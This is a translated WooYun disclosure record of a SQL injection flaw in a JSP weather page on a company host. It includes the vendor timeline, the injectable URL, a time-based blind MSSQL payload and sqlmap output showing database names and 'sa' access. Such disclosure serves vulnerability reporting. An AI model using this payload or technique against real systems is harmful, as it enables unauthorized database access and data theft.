WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
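2015-08-29: Details reported to the vendor; awaiting vendor handling
2015-09-02: Vendor confirmed; details disclosed to the vendor only
2015-09-12: Details disclosed to core white hats and experts in related fields
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public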
SQL injection
Injection point
http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5 WAITFOR DELAY '0:0:5'&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415='
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Databases
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Current user and current database
current user: 'sa'
current database: 'ecology'
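Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-09-02 10:29
Thank you very much for the information you provided; we will confirm it as soon as possible.
None at this time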